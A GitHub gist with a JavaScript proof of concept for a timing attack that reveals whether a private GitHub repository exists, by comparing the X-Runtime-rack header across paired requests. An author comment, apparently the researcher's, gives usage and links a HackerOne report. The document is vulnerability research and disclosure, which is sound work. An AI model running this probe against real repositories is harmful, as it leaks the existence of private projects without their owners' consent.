Instantly share code, notes, and snippets.

Embed
What would you like to do?
GitHub private repository existence disclosure timing attack
"use strict";
const RepoExists = (name) => {
const githubUrl = "https://github.com/" + name;
const runtime = 'X-Runtime-rack';
const threshold = 0.0077235; // Half of L-estimator of source deltas (~20ms)
const deltas = [];
const next = (samplesLeft) => {
if (samplesLeft < 1) {
const len = deltas.length;
deltas.sort((a, b) => a - b);
const estimate = (deltas[len * 0.4 | 0] + deltas[len * 0.6 | 0]) / 2;
return Promise.resolve(estimate >= threshold);
}
const random = Math.random().toString(36).slice(2);
return Promise.all([
fetch(githubUrl + random + '?_=' + random),
fetch(githubUrl + '?_=' + random)
]).then((responses) => {
const control = responses[0];
const test = responses[1];
if (!control.headers.has(runtime) || !test.headers.has(runtime)) {
throw new Error(`GitHub did not provide ${runtime} header.`);
}
const delta = +test.headers.get(runtime)
- +control.headers.get(runtime);
deltas.push(delta);
return next(samplesLeft - 1);
});
};
return next(16);
};
@eligrey

This comment has been minimized.

Copy link
Owner Author

eligrey commented Oct 11, 2018

PoC usage from the context of a GitHub.com URL (assuming X-Runtime-rack header is present):

RepoExists(repo_name).then(exists =>
    console.log("repo " + (exists ? "exists" : "doesn't exist"))
)

My HackerOne profile: https://hackerone.com/eli

HackerOne entry for this vulnerability (private, as GitHub has not disclosed it publicly): https://hackerone.com/reports/417374

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment